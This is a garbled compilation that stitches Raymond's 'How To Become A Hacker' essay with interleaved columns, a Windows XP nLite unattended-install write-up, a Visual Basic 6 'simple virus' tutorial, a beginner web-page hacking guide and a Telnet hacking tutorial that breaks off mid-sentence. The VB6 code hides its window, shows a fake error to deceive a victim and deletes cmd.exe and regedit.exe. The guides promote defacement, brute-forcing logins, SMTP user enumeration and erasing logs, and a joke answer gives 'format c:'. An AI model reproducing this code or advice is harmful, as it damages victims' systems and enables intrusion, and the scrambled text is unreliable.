Java is also a good language for learning to modifying editing modes for the Emacs text
program in. It is more difficult than Python, but editor.)
produces faster code than Python. I think it
makes an excellent second language. It's best, actually, to learn all five of these
(Python, Java, C/C++, Perl, and LISP). Besides
But be aware that you won't reach the skill level being the most important hacking languages,
of a hacker or even merely a programmer if you they represent very different approaches to
only know one or two languages --- you need to programming, and each will educate you in
learn how to think about programming problems valuable ways.
in a general way, independent of any one
I can't give complete instructions on how to learn Unix is the operating system of the Internet.
to program here --- it's a complex skill. But I can While you can learn to use the Internet without
tell you that books and courses won't do it knowing Unix, you can't be an Internet hacker
(many, maybe most of the best hackers are self- without understanding Unix. For this reason, the
taught). You can learn language features --- bits hacker culture today is pretty strongly Unix-
of knowledge --- from books, but the mind-set centered. (This wasn't always true, and some old-
that makes that knowledge into living skill can time hackers still aren't happy about it, but the
be learned only by practice and apprenticeship. symbiosis between Unix and the Internet has
What will do it is (a) reading code and (b) become strong enough that even Microsoft's
writing code. muscle doesn't seem able to seriously dent it.)

Learning to program is like learning to write So, bring up a Unix --- I like Linux myself but
good natural language. The best way to do it is to there are other ways (and yes, you can run both
read some stuff written by masters of the form, Linux and Microsoft Windows on the same
write some things yourself, read a lot more, write machine). Learn it. Run it. Tinker with it. Talk to
a little more, read a lot more, write some more - the Internet with it. Read the code. Modify the
and repeat until your writing begins to develop code. You'll get better programming tools
the kind of strength and economy you see in (including C, LISP, Python, and Perl) than any
your models. Microsoft operating system can dream of
hosting, you'll have fun, and you'll soak up more
Finding good code to read used to be hard, knowledge than you realize you're learning until
because there were few large programs available you look back on it as a master hacker.
in source for fledgeling hackers to read and
tinker with. This has changed dramatically; For more about learning Unix, see The
open-source software, programming tools, and Loginataka. You might also want to have a look
operating systems (all built by hackers) are now at The Art Of Unix Programming.
widely available. Which brings me neatly to our
next topic? To get your hands on a Linux, see the Linux
Online! site; you can download from there or
2. Get one of the open-source Unixes (better idea) find a local Linux user group to help
and learn to use and run it. you with installation. From a new user's point of
I'm assuming you have a personal computer or view, all Linux distributions are pretty much
can get access to one (these kids today have it so equivalent.
easy :-)). The single most important step any
newbie can take toward acquiring hacker skills is You can find BSD Unix help and resources at
to get a copy of Linux or one of the BSD- www.bsd.org.
Unixes, install it on a personal machine, and run
it. I have written a primer on the basics of Unix and
the Internet.
Yes, there are other operating systems in the
world besides Unix. But they're distributed in (Note: I don't really recommend installing either
binary --- you can't read the code, and you can't Linux or BSD as a solo project if you're a
modify it. Trying to learn to hack on a Microsoft newbie. For Linux, find a local Linux user's
Windows machine or under MacOS or any other group and ask for help.)
closed-source system is like trying to learn to
dance while wearing a body cast. 3. Learn how to use the World Wide
Web and write HTML.
Under OS/X it's possible, but only part of the
system is open source --- you're likely to hit a lot
of walls, and you have to be careful not to Most of the things the hacker culture has built do
develop the bad habit of depending on Apple's their work out of sight, helping run factories and
proprietary code. If you concentrate on the Unix offices and universities without any obvious
under the hood you can learn some useful things. impact on how non-hackers live. The Web is the
one big exception, the huge shiny hacker toy that
even politicians admit is changing the world. For
this reason alone (and a lot of other good ones as Status in the Hacker Culture
well) you need to learn how to work the Web.
Like most cultures without a money economy,
This doesn't just mean learning how to drive a hackerdom runs on reputation. You're trying to
browser (anyone can do that), but learning how solve interesting problems, but how interesting
to write HTML, the Web's markup language. If they are, and whether your solutions are really
you don't know how to program, writing HTML good, is something that only your technical peers
will teach you some mental habits that will help or superiors are normally equipped to judge.
you learn. So build a home page. Try to stick to
XHTML, which is a cleaner language than
classic HTML. (There are good beginner Accordingly, when you play the hacker game,
tutorials on the Web; here's one.) you learn to keep score primarily by what other
hackers think of your skill (this is why you aren't
really a hacker until other hackers consistently
But just having a home page isn't anywhere near call you one). This fact is obscured by the image
good enough to make you a hacker. The Web is of hacking as solitary work; also by a hacker-
full of home pages. Most of them are pointless, cultural taboo (now gradually decaying but still
zero-content sludge --- very snazzy-looking potent) against admitting that ego or external
sludge, mind you, but sludge all the same (for validation are involved in one's motivation at all.
more on this see The HTML Hell Page).
Specifically, hackerdom is what anthropologists
To be worthwhile, your page must have content - call a gift culture. You gain status and reputation
-- it must be interesting and/or useful to other in it not by dominating other people, nor by
hackers. And that brings us to the next topic? being beautiful, nor by having things other
people want, but rather by giving things away.
4. If you don't have functional Specifically, by giving away your time, your
English, learn it. creativity, and the results of your skill.

As an American and native English-speaker There are basically five kinds of things you can
myself, I have previously been reluctant to do to be respected by hackers:
suggest this, lest it be taken as a sort of cultural
imperialism. But several native speakers of other 1. Write open-source software
languages have urged me to point out that
English is the working language of the hacker The first (the most central and most traditional)
culture and the Internet, and that you will need to is to write programs that other hackers think are
know it to function in the hacker community. fun or useful, and give the program sources away
to the whole hacker culture to use.
This is very true. Back around 1991 I learned
that many hackers who have English as a second (We used to call these works 'free software', but
language use it in technical discussions even this confused too many people who weren't sure
when they share a birth tongue; it was reported to exactly what 'free' was supposed to mean. Most
me at the time that English has a richer technical of us, by at least a 2:1 ratio according to web
vocabulary than any other language and is content analysis, now prefer the term 'open-
therefore simply a better tool for the job. For source' software).
similar reasons, translations of technical books
written in English are often unsatisfactory (when
they get done at all). Hackerdom's most revered demigods are people
who have written large, capable programs that
met a widespread need and given them away, so
Linus Torvalds, a Finn, comments his code in that now everyone uses them.
English (it apparently never occurred to him to
do otherwise). His fluency in English has been
an important factor in his ability to recruit a 2. Help test and debug open-source
worldwide community of developers for Linux. software
It's an example worth following.
They also serve who stand and debug open- primer on how to become a hacker :-)). This is
source software. In this imperfect world, we will not something you'll be positioned to do until
inevitably spend most of our software you've been around for while and become well-
development time in the debugging phase. That's known for one of the first four things.
why any open-source author who's thinking will
tell you that good beta-testers (who know how to The hacker culture doesn't have leaders, exactly,
describe symptoms clearly, localize problems but it does have culture heroes and tribal elders
well, can tolerate bugs in a quickie release, and and historians and spokespeople. When you've
are willing to apply a few simple diagnostic been in the trenches long enough, you may grow
routines) are worth their weight in rubies. Even into one of these. Beware: hackers distrust
one of these can make the difference between a blatant ego in their tribal elders, so visibly
debugging phase that's a protracted, exhausting reaching for this kind of fame is dangerous.
nightmare and one that's merely a salutary Rather than striving for it, you have to sort of
nuisance. position yourself so it drops in your lap, and then
be modest and gracious about your status.
If you're a newbie, try to find a program under
development that you're interested in and be a The Hacker/Nerd Connection
good beta-tester. There's a natural progression
from helping test programs to helping debug
them to helping modify them. You'll learn a lot Contrary to popular myth, you don't have to be a
this way, and generate good karma with people nerd to be a hacker. It does help, however, and
who will help you later on. many hackers are in fact nerds. Being a social
outcast helps you stay concentrated on the really
important things, like thinking and hacking.
3. Publish useful information
For this reason, many hackers have adopted the
Another good thing is to collect and filter useful label 'nerd' and even use the harsher term 'geek'
and interesting information into web pages or as a badge of pride --- it's a way of declaring
documents like Frequently Asked Questions their independence from normal social
(FAQ) lists, and make those generally available. expectations. See The Geek Page for extensive
discussion.
Maintainers of major technical FAQs get almost
as much respect as open-source authors. If you can manage to concentrate enough on
hacking to be good at it and still have a life,
4. Help keep the infrastructure that's fine. This is a lot easier today than it was
working when I was a newbie in the 1970s; mainstream
culture is much friendlier to techno-nerds now.
There are even growing numbers of people who
The hacker culture (and the engineering realize that hackers are often high-quality lover
development of the Internet, for that matter) is and spouse material.
run by volunteers. There's a lot of necessary but
unglamorous work that needs done to keep it
going --- administering mailing lists, moderating If you're attracted to hacking because you don't
newsgroups, maintaining large software archive have a life, that's OK too --- at least you won't
sites, developing RFCs and other technical have trouble concentrating. Maybe you'll get a
standards. life later on.

People who do this sort of thing well get a lot of Points For Style
respect, because everybody knows these jobs are
huge time sinks and not as much fun as playing Again, to be a hacker, you have to enter the
with code. Doing them shows dedication. hacker mindset. There are some things you can
do when you're not at a computer that seem to
5. Serve the hacker culture itself help. They're not substitutes for hacking (nothing
Finally, you can serve and propagate the culture is) but many hackers do them, and feel that they
itself (by, for example, writing an accurate connect in some basic way with the essence of
hacking.
• Learn to write your native language • don't post or email writing that's full of
well. Though it's a common stereotype spelling errors and bad grammar.
that programmers can't write, a
surprising number of hackers (including The only reputation you'll make doing any of
all the most accomplished ones I know these things is as a twit. Hackers have long
of) are very able writers. memories --- it could take you years to live your
• Read science fiction. Go to science early blunders down enough to be accepted.
fiction conventions (a good way to meet
hackers and proto-hackers). The problem with screen names or handles
• Study Zen, and/or take up martial arts. deserves some amplification. Concealing your
(The mental discipline seems similar in identity behind a handle is a juvenile and silly
important ways.) behavior characteristic of crackers, warez d00dz,
• Develop an analytical ear for music. and other lower life forms. Hackers don't do this;
Learn to appreciate peculiar kinds of they're proud of what they do and want it
music. Learn to play some musical associated with their real names. So if you have a
instrument well, or how to sing. handle, drop it. In the hacker culture it will only
• Develop your appreciation of puns and mark you as a loser.
wordplay.
Other Resources
The more of these things you already do, the
more likely it is that you are natural hacker
material. Why these things in particular is not Peter Seebach maintains an excellent Hacker
completely clear, but they're connected with a FAQ for managers who don't understand how to
mix of left- and right-brain skills that seems to deal with hackers. If Peter's site doesn't respond,
be important; hackers need to be able to both the following Excite search should find a copy.
reason logically and step outside the apparent
logic of a problem at a moment's notice. There is a document called How To Be A
Programmer that is an excellent complement to
Work as intensely as you play and play as this one. It has valuable advice not just about
intensely as you work. For true hackers, the coding and skillsets, but about how to function
boundaries between "play", "work", "science" on a programming team.
and "art" all tend to disappear, or to merge into a
high-level creative playfulness. Also, don't be I have also written A Brief History Of
content with a narrow range of skills. Though Hackerdom.
most hackers self-describe as programmers, they
are very likely to be more than competent in I have written a paper, The Cathedral and the
several related skills --- system administration, Bazaar, which explains a lot about how the
web design, and PC hardware troubleshooting Linux and open-source cultures work. I have
are common ones. A hacker who's a system addressed this topic even more directly in its
administrator, on the other hand, is likely to be sequel Homesteading the Noosphere.
quite skilled at script programming and web
design. Hackers don't do things by halves; if they Rick Moen has written an excellent document on
invest in a skill at all, they tend to get very good how to run a Linux user group.
at it.
Rick Moen and I have collaborated on another
Finally, a few things not to do. document on How To Ask Smart Questions. This
will help you seek assistance in a way that makes
• don't use a silly, grandiose user ID or it more likely that you will actually get it.
screen name.
• don't get in flame wars on Usenet (or If you need instruction in the basics of how
anywhere else). personal computers, Unix, and the Internet work,
• don't call yourself a 'cyberpunk', and see The Unix and Internet Fundamentals
don't waste your time on anybody who HOWTO.
does.
When you release software or write patches for The best way for you to get started would
software, try to follow the guidelines in the probably be to go to a LUG (Linux user group)
Software Release Practice HOWTO. meeting. You can find such groups on the LDP
General Linux Information Page; there is
If you enjoyed the Zen poem, you might also like probably one near you, possibly associated with
Rootless Root: The Unix Koans of Master Foo. a college or university. LUG members will
probably give you a Linux if you ask, and will
certainly help you install one and get started.
Frequently Asked Questions
Q:
Q:
When do you have to start? Is it too late for me
Will you teach me how to hack? to learn?

A: A:

Since first publishing this page, I've gotten Any age at which you are motivated to start is a
several requests a week (often several a day) good age. Most people seem to get interested
from people to "teach me all about hacking". between ages 15 and 20, but I know of
Unfortunately, I don't have the time or energy to exceptions in both directions.
do this; my own hacking projects, and traveling
as an open-source advocate, take up 110% of my
time. Q:

Even if I did, hacking is an attitude and skill you How long will it take me to learn to hack?
basically have to teach yourself. You'll find that
while real hackers want to help you, they won't A:
respect you if you beg to be spoon-fed
everything they know. That depends on how talented you are and how
hard you work at it. Most people can acquire a
Learn a few things first. Show that you're trying, respectable skill set in eighteen months to two
that you're capable of learning on your own. years, if they concentrate. don't think it ends
Then go to the hackers you meet with specific there, though; if you are a real hacker, you will
questions. spend the rest of your life learning and perfecting
your craft.
If you do email a hacker asking for advice, here
are two things to know up front. First, we've Q:
found that people who are lazy or careless in
their writing are usually too lazy and careless in Are Visual Basic or C# good languages to start
their thinking to make good hackers --- so take with?
care to spell correctly, and use good grammar
and punctuation, otherwise you'll probably be A:
ignored. Secondly, don't dare ask for a reply to
an ISP account that's different from the account
If you're asking this question, it almost certainly
you're sending from; we find people who do that
means you're thinking about trying to hack under
are usually thieves using stolen accounts, and we
Microsoft Windows. This is a bad idea in itself.
have no interest in rewarding or assisting
When I compared trying to learn to hack under
thievery.
Windows to trying to learn to dance while
wearing a body cast, I wasn't kidding. don't go
Q: there. It's ugly, and it never stops being ugly.

How can I get started, then? There are specific problems with Visual Basic
and C#; mainly that they're not portable. Though
A: there are prototype open-source implementations
of these languages, the applicable ECMA A:
standards don't cover more than a small set of
their programming interfaces. On Windows most This is cracking. Get lost, moron.
of their library support is proprietary to a single
vendor (Microsoft); if you aren't extremely
Q:
careful about which features you use --- more
careful than any newbie is really capable of
being --- you'll end up locked into only those How can I steal channel op privileges on IRC?
platforms Microsoft chooses to support. If you're
starting on a Unix, much better languages with A:
better libraries are available.
This is cracking. Begone, cretin.
Visual Basic is especially awful. Like other
Basics it's a poorly-designed language that will Q:
teach you bad programming habits. No, don't ask
me to describe them in detail; that explanation I've been cracked. Will you help me fend off
would fill a book. Learn a well-designed further attacks?
language instead.
A:
One of those bad habits is becoming dependent
on a single vendor's libraries, widgets, and
No. Every time I've been asked this question so
development tools. In general, any language that
far, it's been from some poor sap running
isn't fully supported under at least Linux or one
Microsoft Windows. It is not possible to
of the BSDs, and/or at least three different
effectively secure Windows systems against
vendors' operating systems, is a poor one to learn
crack attacks; the code and architecture simply
to hack in.
have too many flaws, which makes securing
Windows like trying to bail out a boat with a
Q: sieve. The only reliable prevention starts with
switching to Linux or some other operating
Would you help me to crack a system, or teach system that is designed to at least be capable of
me how to crack? security.

A: Q:

No. Anyone who can still ask such a question I'm having problems with my Windows
after reading this FAQ is too stupid to be software. Will you help me?
educable even if I had the time for tutoring. Any
emailed requests of this kind that I get will be A:
ignored or answered with extreme rudeness.
Yes. Go to a DOS prompt and type "format c:".
Q: Any problems you are experiencing will cease
within a few minutes.
How can I get the password for someone else's
account? Q:

A: Where can I find some real hackers to talk with?

This is cracking. Go away, idiot. A:

Q: The best way is to find a Unix or Linux user's


group local to you and go to their meetings (you
How can I break into/read/monitor someone can find links to several lists of user groups on
else's email? the LDP site at ibiblio).
(I used to say here that you wouldn't find any will hear a lot of people recommending Perl, and
real hackers on IRC, but I'm given to understand Perl is still more popular than Python, but it's
this is changing. Apparently some real hacker harder to learn and (in my opinion) less well
communities, attached to things like GIMP and designed.
Perl, have IRC channels now.)
C is really important, but it's also much more
Q: difficult than either Python or Perl. don't try to
learn it first.
Can you recommend useful books about
hacking-related subjects? Windows users, do not settle for Visual Basic. It
will teach you bad habits, and it's not portable off
A: Windows. Avoid.

I maintain a Linux Reading List HOWTO that Q:


you may find helpful. The Loginataka may also
be interesting. What kind of hardware do I need?

For an introduction to Python, see the A:


introductory materials on the Python site.
It used to be that personal computers were rather
Q: underpowered and memory-poor, enough so that
they placed artificial limits on a hacker's learning
Do I need to be good at math to become a process. This stopped being true some time ago;
hacker? any machine from an Intel 486DX50 up is more
than powerful enough for development work, X,
and Internet communications, and the smallest
A:
disks you can buy today are plenty big enough.
No. While you do need to be able to think
logically and follow chains of exact reasoning, The important thing in choosing a machine on
hacking uses very little formal mathematics or which to learn is whether its hardware is Linux-
compatible (or BSD-compatible, should you
arithmetic.
choose to go that route). Again, this will be true
for most modern machines. The only real sticky
In particular, you won't need trigonometry, area is modems; some machines have Windows-
calculus or analysis (we leave that stuff to the specific hardware that won't work with Linux.
electrical engineers :-)). Some grounding in finite
mathematics (including Boolean algebra, finite-
set theory, combinatorics, and graph theory) can There's a FAQ on hardware compatibility; the
be helpful. latest version is here.

Q: Q:

I want to contribute. Can you help me pick a


What language should I learn first?
problem to work on?
A:
XHTML (the latest dialect of HTML) if you A:
don't already know it. There are a lot of glossy,
hype-intensivebad HTML books out there, and No, because I don't know your talents or
distressingly few good ones. The one I like best interests. You have to be self-motivated or you
is HTML: The Definitive Guide. won't stick, which is why having other people
choose your direction almost never works.
But HTML is not a full programming language.
When you're ready to start programming, I Try this. Watch the project announcements scroll
would recommend starting with Python. You by on Freshmeat for a few days. When you see
one that makes you think "Cool! I'd like to work This seems unlikely --- so far, the open-source
on that!", join it. software industry seems to be creating jobs
rather than taking them away. If having a
Q: program written is a net economic gain over not
having it written, a programmer will get paid
whether or not the program is going to be open-
Do I need to hate and bash Microsoft?
source after it's done. And, no matter how much
"free" software gets written, there always seems
A: to be more demand for new and customized
applications. I've written more about this at the
No, you don't. Not that Microsoft isn't Open Source pages.
loathsome, but there was a hacker culture long
before Microsoft and there will still be one long Q:
after Microsoft is history. Any energy you spend
hating Microsoft would be better spent on loving
How can I get started? Where can I get a free
your craft. Write good code --- that will bash
Microsoft quite sufficiently without polluting Unix?
your karma.
A:
Q:
Elsewhere on this page I include pointers to
But won't open-source software leave where to get the most commonly used free Unix.
To be a hacker you need motivation and
programmers unable to make a living?
initiative and the ability to educate yourself. Start
now?
A:
How to make your own Windows XP written
I thought about writing up my own experience about customizing
and making an uA (unattended) install of my Windows XP SP2
in the past but kept putting it off thinking no one would even be
interested. Well I recently talked with one of the RMs about nLite
and not long ago posted a bit about it in Software Support then
got a PM asking me about it. So I said to myself why not, maybe
someone will find it useful after all.

First off something like this isn't all that uncommon and an uA
version esp. made for NXS has been around for a while. Think of
this as my own version of that, although I started from zero.

The software I use to make my own version:


nLite (Framework .NET is needed but one (I do) can also use just
the runtimes made esp. for nLite)
Universal Silent Switch Finder (simplifies the task of finding out
which installer a certain application uses)
And of course Windows XP Pro with SP2 already slipstreamed.

I make a folder named XPCD on my HDD and copy the content


of the XP SP2 CD there. I also make two additional folders,
Drivers in which I put all the drivers I'll be integrating and
$OEM$ which is where all my additional tweaks, programs,...
are. For some additional information about $OEM$ folders and
their structure take a look at
http://unattended.msfn.org/global/oemfolders.htm

Open up nLite and am presented with these options (all of which


except the “Integrate a Service Pack” I check, I obviously don't
have any need for that):

Of course everyone has different needs and will remove


accordingly, or not remove anything at all.
A couple explanations:
- I leave Outlook Express only because I frequently use
.mht files and removing Outlook Express breaks support
for them.
Proceed by clicking next then I browse to my XPCD folder and - I remove everything that is related to the Security
the fun starts. Center, firewall. I don't need that since I'm using Kerio
“Remove Components” is next up. There I obviously, well start Personal Firewall and don't need an extra service
removing components that I don't need and end up with running (and taking up the space) just to tell me my
something like this: firewall, anti virus and Automatic Updates are On/Off.
- Search Assistant is needed in my case because I have
set up the search in XP exactly to my liking.
- the reason I leave NetShell Cmd-Tool is because in my uA It lets you integrate various drivers. I for one integrate the
install I remove the DHCP service and use static IPs. That drivers for my onboard sound card, both my NICs, SMBus
tool does not only let me do that but let's me set my subnet and SATA. Once the SATA drivers are integrated there's
mask, default gateway and DNS server addresses. Meaning no need to press F6 when installing all in the spirit of
once the install is complete I am online and joined to a making it an uA install.
workgroup (check “Unattended Setup” “Personal” tab for
more details) immediately. BTW if anyone has a need to Next there's the “Integrate Hotfixes” feature. It basically
change their TCP/IP settings and doesn't want to reboot, this lets you slipstream all the hotfixes you see fit with
tool often comes in handy. Windows. That way when you install Windows you're
- I also remove OOBE when dealing with Corporate versions installing a more secure version, no need to go to
of XP. Windows Update right away.
There are others I leave/remove for peculiar reasons but the The hotfixes and instructions are available on RyanVM's
above are most common. Windows XP Post-SP2 Update Pack page
http://www.ryanvm.net/msfn/updatepack.html
Next up is “Unattended Setup” which lets you set personal
settings in advance.

Clicking next takes us to “Options and Tweaks”.

It's pretty self explanatory but this is what I do here:


- “Information” tab I check Unattended Installation.
- “General 1/2” tab I put in the CD-Key, switch Unattended
Mode to FullUnattended and check Classic Theme (would
end up with a classic one in any case since it's one of those
services I remove).
- “General 2/2” is untouched by me.
- “Personal” tab I put in my Full Name, Computer Name,
Workgroup, Language and Timezone. Just in case anyone is
wondering I create an admin password once my XP install is
complete.
- “Display” tab I pick my desired color depth, screen
resolution and refresh rate.
Moving forward there's the “Integrate Drivers” feature
There are several tweaks available there all I can say is
read up on them and use the ones you find useful. I might
also add that I use a regtweaks.reg file in addition to the
tweaks available here. That file has numerous other tweaks
I use in it.
After all is done I get this: There are numerous other things I do to customize my
uA XP but will only mention a few.
Once the install completes I have my FTP and HTTP
servers up and running in full working order. The FTP
server comes with all the settings, users. My HTTP
server comes not only with all the files I want to share
with the rest but with PHP, ASP, Perl, coppermine,
phpMyAdmin and some additional features.
My TightVNC server runs on a predefined port and has
it's password set.
Miranda IM has all of my contacts and is also
automatically connected online.
I add/remove various things to my Windows Explorer
context menu, adjust all of it's icons in addition I label
all my HDD partitions, tweak my QuickLaunch, Start
A much reduced version (only 218,29MB big) of menu, desktop and general appearance, the hot keys on
Windows XP that does everything I want it to do. my Microsoft keyboard are set precisely how I want
them to be, mIRC comes with all the scripts and
This is the end of nLite, I only on occasion use it to connects to all the networks/channels,...
make an .iso but not before I copy the $OEM$ folder
into the XPCD one. I say on occassion because I As I said before I remove a lot of components and
usually use CDIMAGE which is neatly integrated into among them are also services, for which I also specify if
my context menu. they are on automatic, manual, disabled. Here's how
they look at first boot of Windows.
I'm attaching a programs.txt file with all the programs
which are silently installed (or don't need to be
installed) and which I'm currently using in my uA
version (not all of the programs are the latest version,
I'm aware of that, they will be in my next uA install).

As you might have noticed by looking at that


programs.txt I'm using a lot of F/OSS (free/open
source software). With these exceptions:
- Beyond Compare: haven't found a better alternative
to it yet, well a free one. There are actually quite a few
available but none has the context integration this one
offers, so I'm still looking.
- mIRC: have bought a copy.
- Nero: am using an OEM version.
- PhotoStitch: am also using an OEM version.

I really don't use any other program with the


exception of Photoshop/Imageready which I don't
install uA since they take up too much space. I might
also note that using GIMP as an alternative just won't
do for me.
So out of all the software I need and actually use two
are unpaid for, yes I have a couple of legit XP copies.

The switches for silently installing all those


applications are quite easily available and USSF will This is a "short" description of my uA/customised
also help you out quite a bit there. Windows XP SP2. I may or may not add more in the
Before I have to install Windows again I always future.
update the programs and some of the settings. For
example I also update my Thunderbird profile folder To be shure check: http://ccucu.com
so it includes the latest address book and all e-mails I
need. Same with Firefox, I make sure all my latest
bookmarks, settings and the latest versions of
extensions are included.
Visual Basic 6 – Creating a Simple Virus

You can even give the text box a name to make it


quicker. I have labelled it ‘A’

Private Sub Form_Load()


Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub
Now many of you feel that creating a virus is
impossible especially for you beginners. Well Private Sub Command1_Click
this tutorial shows you how to create a simple Kill A
virus with just a few lines of code. A virus can
End Sub
be an application that deletes files upon request,
this is seen as infecting your computer because
by deleting key files you may need to take action Now once the command button is clicked on the
to get your computer back to normal. project the command file will be deleted.

First of all open a new Visual Basic project, a Now we will use the timer in this one. If you
standard exe file.. want to disguise your scheme then this is a good
way to do it, Here we will send a fake message
error pretending the application hasn’t got
Now it depends on how you want your virus to enough memory to run, but in actual fact the
work, I feel it is best if it is activated once your
victim doesn’t know that you have just removed
application is opened so the main code codes in their command file.
the form load sub.

On your project insert a text box , a command


button and a timer, we will be using the
command button and timer a little later on. Here is to go about it…

In the project put in the file you want to delete, Private Sub Form_Load()
for example if you wanted to delete the Form1.Visible = False
command file then you would put the following Text1.Text = “C:/Windows/System32/cmd.exe”
code in the form load tab. A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough
Memory.”), vbCritical, “Runtime Error”
Private Sub Form_Load() End Sub
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Once the project is opened then the command Timer1.Enabled = False
file will be removed.
End Sub

Now I will show you an example of doing this


All we have done above is made the form
using a command button. Put the following code invisible so that it makes the error message look
in the command button and in the form load. real, we have set an interval of 5 seconds on the
timer before the file is deleted and that’s how
simple it can be to fool someone.
Right, we can now make it a little more difficult
if you are finding the above a little too easy. Hacking a
How about removing more than 1 file, well this
is how you could go about doing that, we will
webpage
stick with the message box fool because I think
that works well.

The example below shows how to remove the


files when the application is loaded, we will not
be using timers or command buttons in this one.
We will not even be using text boxes because
they are not needed, you can just do what is
shown below.

So in the form load part put the following code.

Private Sub Form_Load() This is just an intro tutorial to web page hacking
Form1.Visible = False made for newbies !
Msgbox (“Runtime Error 492. Not Enough
Memory.”), vbCritical, “Runtime Error” 1)Intro
Kill “C:/Windows/System32/cmd.exe” First of all,why you want to hack a webpage?Is it
Kill “C:/Windows/regedit.exe” a certain webpage or any site at all? There are
End Sub many reasons to hack a website, or a
webmaster.Maybe you want to take a revenge or
So above we will be removing the command file maybe you want to have fun or just learn how to
and the registry, I don’t think the victim will be do it ! You can deface the website which means
best pleased about that do you. replace the original index with a new one or you
can gain access to the member area of the site
Now I have shown you the above information I which might be easier.
think it’s your turn to try and create your own, 2)DEFACE:You can deface the site through
now you can test it on your own pc, just copy a telnet or your browser by running remote
file, lets say the cmd.exe file and paste it into commands on an old or misconfigured server,
your C:/ the hard thing to do is find an old server , maybe
a network of a school or university would do,get
a CGI BUG searcher.This program will scan
Then put in the code above but in the Kill put ranges of IPs for web-servers and will scan them
this… for known bugs in their cgis or other bugs and
holes.You can learn how to exploite a certain
Kill “C:/cmd.exe” hole by adding in yahoo the name of the
bug/hole and the word exploit,search for
That’s all you need to kill, then you will see the "cmd.exe exploit".There are more than 700 holes
file has been removed. Keep trying new things that many servers might have! You can also
like I have shown and you will be a pro in no deface a website by finding the ftp password and
time. just browse through the sites ftp and replace the
index.htm.You do that with the :
3)BRUTE FORCE ATTACK :To do that you
need a brute forcer or brute force attacker and
some word lists,the brute forcer sends multiple
user/pass requests of words that picks up from
namelists and tries to hack the account untill it
does! So lets say imagine a porn site that asks for
a password , you go there you copy their address
, you add the address in a program called brute
forcer and then from the brute forcer you choose
a text file with names to be used as usernames Port 25 is the 'Sendmail Protocol' port. We will
and a text with names to be used as be dealing with this port as well.
passwords,the brute forcer will try untill it finds
a correct user/pass This should be easier for the
newbies than exploiting cgi bugs , many of the Telnet Security
newbies havent even heard of it i hope i didnt
confuse you with this tutorial there might be Because there are so many problems with Telnet
more tuts about web hacking and cgi bugs and today involving cyber crime and hacking,
such.Till then try to find the way to cgi bugs
SysAdmins often restrict anonymous use of their
yourself with the cgi scanners in the Web Hacks sys's Telnet Proxies. This is cheap and can be
section or download a brute forcer to crack bypassed easily.
accounts.
Most SysAdmins are amatures at what they do
Telnet - A Tutorial and make me laugh. They restrict the Telnet
proxies on port 23 and think that we can't telnet
to other ports such as 81 and 25 because we can't
to Telnet and use the Telnet Proxy. Well they are wrong. We
can easily do it and we will. Let me point out a
Hacking system that has this and was not effective. I will
star out the IP for privacy.

Welcome to Microsoft Telnet. Telnet32.exe.


o
<to> 202.232.**.**
connecting to 202.232.**.** 23 (The port
number)
Connected.
Now you may be looking at this going, "What
Connection to host lost (unauthorized use of
the hell is Telnet?". If you are, don't worry, I'll
Telnet Proxy(ies).
explain everything. First of all, Telnet is
o
software that allows you to connect to another
<to> 202.232.**.** 25
Telnet Host.
Connecting to 202.232.**.** 25 (Watch this..)
Welcome to ********.net Sendmail Program.
In windows systems Telnet is usually called Welcome to all staff.
Telnet32.exe or Telnet.exe. In newer versions of vrfy bin
windows it is Telnet32.exe. ..550 <bin@********.net>
*** Note to Windows XP users: Don't go and get vrfy sys
the old version of Telnet, because you have a ..550 <sys@********.net>
DOS-Based one. I'll give commands along this vrfy root
guide so you can enjoy it too. You have to either ..550 <root********.net>
run "Telnet" or "cmd" and then "Telnet". vrfy admin
..550 <admin@********.net>
Telnet is not illegal and is used by thousands of vrfy games
remote computers to interchange data, share ..550 <games@********.net>
connections, and do many other things that vrfy uucp
would be impossible without it. ..550 <uucp@********.net>
q
The default port for Telnet is port 23. When I say ..550 <command not recognized>
for instance, 'Connect to the sys' I am referring to c
connecting on the system's default port for Connection to host lost on command.
Telnet. Sometimes you can't determine a port so
you will have to port scan a sys to find the Telnet Ok people is there a problem there? How many
Ports. addys did I get? Am I supposed to have those?
Do I care? No. I am just demonstrating how
sh1tty Unix-System security is and how easy it is
to use the Telnet Proxy to your advantage. Here, I went further than you because I thought I knew
I wil list some commands for all of you running what I was doing! I got this message saying my
under DOS. hacking attempt was logged! Am I going to go to
jail!?!?!
C - Close the Current Connection
D - Display the sys's operating paremeters Don’t worry, as long as its not with the extension
O - Connect to a host name (on default port 23) .log or .hlog or .hacklog you're fine, as 95
[port] percent of these messages are BS and lies.
q - Quit (Exit Telnet).
Set- Set Options IF THEY'RE LIES, how come they knew I was
Send - Send data/strings to server hacking them?

Telnet, as you know so far, is a very useful tool They don't. They simply search for incoming
for hackers. Hell, if you can't connect to a connections not recognized by the server. If the
computer, you can't hack it. Its that simple. SysAdmins didn't modify the message, you
would have gotten this:
Now the best thing about Telnet is that virtually
every Windows computer has it, comes with it, "Error 229292: Data not recognized 8191:
and is able to run it. Distinct Remote Service Lost or Corrupt."

They just modified it. Breath in, breath out,


THINGS GOING WRONG ON HACKING OR relax.
TELNET

I have a Windows 98 computer and I am running My dad or mom found out I was hacking, and
Telnet. It gives me a lot more options when my dad's an expert on computers! He made it so
connecting to a computer, and these commands I can't view anything on AOL. What the hell's
don’t go anywhere! What do I do? I get the going on! Give me a trick to evade this!
hostname part and all that, just what does Term-
Type mean? Sure thing. Connect to AOL, ping the site you're
trying to view, and type in the IP address. You
Ok people, so many people have asked me this will get to the homepage, but this isn't that good
I'm ready to start getting an auto-flame response a trick because you can't ping sub-addys and
on my e-mail box LoL. Anyway, here goes: you're going to get text for the sub-urls. This
might or might now work.
Term Type means Terminal Type. It is the
version of the Telnet Terminal that the host or
server is running. You have to specify this, I was screwing around with my friends
Telnet is not hacker-friendly. computer. I think I left my information
somewhere, but where?
In Windows 98/95/ME you are not running a
DOS-Based version of Telnet. You get a client Usually, you have a critical system log. If you
program, somewhat considered shit for me. I like delete a system file (which unless you're 133t
the DOS based one and frankly, I find it a lot you'd NEVER EVER do) the computer's going
easier to use. to boot and give you a log of what happened
before the deletion of the file so you know what
went wrong. If you did happen to delete it, it will
I can't connect to the host! list something like "deletion from x.x.x.x. (your
IP)". If it does, damn, you're busted. But there
Well, the host either doesn't exist, does not are ways of getting rid of this "hacker-knock
